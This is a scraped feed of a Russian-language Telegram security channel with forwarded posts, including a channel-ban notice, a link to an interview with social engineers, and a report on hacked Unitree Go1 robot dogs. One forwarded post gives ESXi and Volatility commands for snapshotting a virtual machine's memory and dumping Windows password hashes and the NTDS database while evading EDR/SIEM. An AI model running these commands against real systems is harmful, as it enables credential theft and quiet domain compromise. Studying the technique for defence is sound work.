Forwarded from BugXplorer (j b)
Please open Telegram to view this post
VIEW IN TELEGRAM
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Whitehat Lab
Как вы уже знаете, мой предыдущий канал был заблокирован.
Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.
К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.
Вот что написано в ToS:
▪️ Не использовать мессенджер для рассылки спама или обмана пользователей;▪️ Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;▪️ Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.▪️ Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.
Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал
Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.
Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
Если этот пост опубликуется, значит канал разблокировали🎉
Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏
Если этот пост опубликуется, значит канал разблокировали🎉
Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏
❤3
Хабр
Простая агентурная работа: интервью с социальными инженерами
Проверка системы безопасности компании это не только пентесты и фишинговые рассылки, но и шпионские операции с проникновением на территорию заказчика. Этим занимаются самые законспирированные...
🔗Ссылка:
https://habr.com/ru/post/660169/
https://habr.com/ru/post/660169/
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from s0ld13r ch. (s0ld13r)
Volatility + ESXi = Бесшумный дамп хэшей и NTDS 😈
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM🐸
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов🪨
Поиск информации о виртуальных машинах на сервере❗️
Создаем snapshot системы с обязательным извлечением🔫
В😆
А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов😏
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
🧢 s0ld13r
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов
Поиск информации о виртуальных машинах на сервере
vim-cmd vmsvc/getallvms
vim-cmd vmsvc/power.getstate <VMID>
vim-cmd vmsvc/get.snapshotinfo <VMID>
Создаем snapshot системы с обязательным извлечением
*.vmem файла vim-cmd vmsvc/snapshot.create <VMID> <snapshotname> <description> true true
ls -ll /vmfs/volumes/
ls -ll /vmfs/volumes/<UUID>/<snapshotname>
В
/vmfs/volumes/<UUID>/<snapshotname> будет файл с расширением *.vmem который можно будет проанализировать при помощи Volatility /tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" imageinfo
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" hashdump
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" filescan | grep ntds.dit
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" dumpfiles -Q <ntds memaddress> --name file -D /tmp/ntds.dit
А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пакет Безопасности
Взлом собаки
Роботы-пылесосы и слитые с них фотографии мы с вами уже однажды обсудили, а теперь очередь дошла до более инновационных сожителей в наших квартирах. Да, роботизированная замена лучших друзей человеков – не самая популярная и распространенная игрушка в нашем регионе, но я думаю, что это вопрос времени.
Одни исследователи безопасности тут выяснили, что через робопсов (Unitree Go1) уже начали следить за их владельцами. При чем в этот раз не через взлом хранилища распознанных фотографий, а через подключение напрямую к камерам собаки в режиме реального времени. И доступ к камерам, насколько я понимаю, далеко не предел возможностей.
Причем это не симулированный взлом на тренировочном полигоне – атаке подверглись порядка 2 000 робопсов по всему миру. Производитель пока не выпускал на эту тему пресс-релизов, поэтому даже не ясно, чинят ли они эту дыру.
В общем, когда надумаете покупать себе искусственную собаку или дворецкого-киборга, знайте о том, что все их органы познания внешнего мира могут принадлежать не только вам, но и кому-угодно в сети. Собственно, это справедливо и для всех остальных устройств с камерами и микрофонами в вашем доме. Вот так и живем.
⚡ Пакет Безопасности | 💬 Чат
🛍 Другие каналы
Роботы-пылесосы и слитые с них фотографии мы с вами уже однажды обсудили, а теперь очередь дошла до более инновационных сожителей в наших квартирах. Да, роботизированная замена лучших друзей человеков – не самая популярная и распространенная игрушка в нашем регионе, но я думаю, что это вопрос времени.
Одни исследователи безопасности тут выяснили, что через робопсов (Unitree Go1) уже начали следить за их владельцами. При чем в этот раз не через взлом хранилища распознанных фотографий, а через подключение напрямую к камерам собаки в режиме реального времени. И доступ к камерам, насколько я понимаю, далеко не предел возможностей.
Причем это не симулированный взлом на тренировочном полигоне – атаке подверглись порядка 2 000 робопсов по всему миру. Производитель пока не выпускал на эту тему пресс-релизов, поэтому даже не ясно, чинят ли они эту дыру.
В общем, когда надумаете покупать себе искусственную собаку или дворецкого-киборга, знайте о том, что все их органы познания внешнего мира могут принадлежать не только вам, но и кому-угодно в сети. Собственно, это справедливо и для всех остальных устройств с камерами и микрофонами в вашем доме. Вот так и живем.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Proxy Bar